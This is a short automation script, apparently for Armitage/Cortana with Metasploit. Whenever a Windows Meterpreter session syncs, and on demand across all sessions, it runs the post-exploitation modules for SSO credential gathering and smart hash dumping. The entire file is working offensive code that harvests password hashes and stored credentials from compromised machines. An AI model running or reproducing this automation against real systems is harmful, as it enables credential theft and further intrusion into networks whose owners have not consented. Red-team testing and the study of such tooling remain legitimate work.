on session_sync {
	if(-iswinmeterpreter $1 && session_host($1)) {
		println("Dumping hashes on session $1");
		post("windows/gather/credentials/sso", $1);
		post("windows/gather/smart_hashdump", $1);
	}
}

command dump_creds {
	foreach $session_id(session_ids()) {
		if(-iswinmeterpreter $session_id && session_host($session_id)) {
			println("Dumping hashes on session $session_id");
			post("windows/gather/credentials/sso", $session_id);
			post("windows/gather/smart_hashdump", $session_id);
		}
	}
}